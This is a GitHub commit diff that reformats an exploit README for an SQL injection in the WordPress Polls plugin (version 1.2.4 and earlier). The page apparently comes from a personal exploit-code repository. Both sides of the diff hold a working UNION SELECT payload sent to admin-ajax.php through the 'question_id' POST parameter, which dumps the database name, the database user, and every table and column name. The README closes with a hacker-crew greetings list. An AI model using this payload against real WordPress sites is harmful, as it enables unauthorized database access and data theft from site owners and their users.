Skip to content

Commit 0e48040

Browse files
Update README.md
1 parent 70fc704 commit 0e48040

File tree

1 file changed

+27
-24
lines changed
  • WordPress Polls plugin-1.2.4- SQL Injection vulnerability

1 file changed

+27
-24
lines changed
Lines changed: 27 additions & 24 deletions
Original file line numberDiff line numberDiff line change
@@ -1,36 +1,39 @@
1-
Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability
2-
Vulnerable version: <=1.2.4
3-
Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
1+
<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
2+
<br>
3+
Vulnerable version:<=1.2.4
4+
<br>Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
45

56
////////////////////////
6-
/// Overview:
7-
////////////////////////
8-
9-
WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
7+
<br>/// Overview:
8+
<br>////////////////////////
9+
<br>
10+
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
1011

1112

1213
////////////////
14+
<br>
1315
/// POC ////
16+
<br>
1417
///////////////
15-
16-
SQL Injection payload to enumerate tables
17-
----------------------------------------------
18-
http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
19-
Post data
20-
question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
18+
<br>
19+
SQL Injection payload to enumerate tables
20+
<br>----------------------------------------------
21+
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
22+
<br><b>Post data</b>
23+
<br>question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
2124

2225

23-
SQLI Screenshot
24-
http://oi67.tinypic.com/2qntt2d.jpg
25-
26+
POC<br>
27+
<img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
28+
<br>
2629

2730
--==[[ Greetz To ]]==--
2831
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
29-
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
30-
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
31-
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
32-
--==[[Love to]]==--
33-
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
34-
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
35-
--==[[ Special Fuck goes to ]]==--
36-
<3 suriya Cyber Tyson <3
32+
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
33+
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
34+
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
35+
<br>
36+
--==[[ Love To ]]==--
37+
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
38+
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
39+

0 commit comments

Comments
 (0)